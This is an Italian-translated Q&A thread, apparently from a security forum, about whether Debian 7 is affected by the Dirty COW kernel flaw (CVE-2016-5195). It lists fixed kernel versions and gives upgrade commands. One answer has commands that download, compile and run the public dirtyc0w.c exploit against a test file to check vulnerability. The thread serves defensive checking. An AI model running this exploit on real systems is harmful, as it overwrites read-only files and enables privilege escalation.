Come verificare che il mio sistema operativo non sia influenzato da CVE-2016-5195 (Dirty COW)?

17

Sto eseguendo la seguente versione del sistema operativo Linux.

Distributor ID: Debian
Description:    Debian GNU/Linux 7.2 (wheezy)
Release:        7.2
Codename:       wheezy

Non sono sicuro che questa versione sia influenzata da CVE-2016-5195

Qualcuno può aiutarmi a chiarire il mio dubbio?

Aggiornamento : dopo aver eseguito il comando indicato da AliCelebi , seguo

3.2.28-cerberhost-0.6-modules-grsec 
    
posta Muk 25.10.2016 - 13:21
fonte

2 risposte

19

Puoi fare uname -rv per scoprire la versione del tuo kernel Linux. Otterrai un risultato simile al seguente:

4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016

Se la tua versione è precedente alla seguente, sei interessato:

  • 4.8.0-26.28 per Ubuntu 16.10

  • 4.4.0-45.66 per Ubuntu 16.04 LTS

  • 3.13.0-100.147 per Ubuntu 14.04 LTS

  • 3.2.0-113.155 per Ubuntu 12.04 LTS

  • 3.16.36-1 + deb8u2 per Debian 8

  • 3.2.82-1 per Debian 7

  • 4.7.8-1 per Debian unstable

risposta data 25.10.2016 - 13:27
fonte
5

In base a security-tracker.debian , devi eseguire uname -a e verificare la versione attuale del kernel.

wheezy  3.2.78-1                        vulnerable
wheezy (security)   3.2.82-1            fixed
jessie  3.16.36-1+deb8u1                vulnerable
jessie (security)   3.16.36-1+deb8u2    fixed
stretch, sid    4.7.8-1                 fixed

Questa vulnerabilità viene corretta in Debian, aggiornando il sistema:

apt-get update
apt-get upgrade
apt-get dist-upgrade

Modifica

How to make sure that my operating system is not affected by CVE-2016-5195?

Puoi provare il seguente tutorial .

Scarica l'exploit.

wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Come root: crea il file foo :

su
echo this is not a test > foo

Come utente:

gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000

Verifica il tuo file:

cat foo

Sul computer vulnerabile otterrai m00000000000000000 come output.

    
risposta data 25.10.2016 - 14:02
fonte

Leggi altre domande sui tag